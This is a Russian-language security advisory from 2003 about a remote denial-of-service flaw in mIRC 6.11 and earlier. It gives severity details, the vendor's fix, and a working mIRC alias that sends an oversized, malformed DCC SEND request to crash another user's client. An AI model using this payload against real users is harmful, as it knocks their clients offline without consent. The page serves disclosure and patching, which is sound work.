Удаленный отказ в обслуживании некорректным DCC запросом в mIRC

Дата публикации:
15.10.2003
Всего просмотров:
1495
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
mIRC 6.x
Уязвимые версии: mIRC version 6.11 и более ранние версии

Описание: Уязвимость обнаружена в mIRC. Удаленный атакующий может аварийно завершить работу клиента.

Удаленный атакующий может послать специально обработанны DCC запрос, чтобы аварийно завершить работу клиента.

Пример/Эксплоит:

mIRC alias:
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ 
$chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }

URL производителя: http://www.mirc.co.uk/

Решение: Установите последнюю версию клиента: http://www.mirc.co.uk/get.html

Ссылки: [Full-Disclosure] Mirc Dos 6.11 and below

или введите имя

CAPTCHA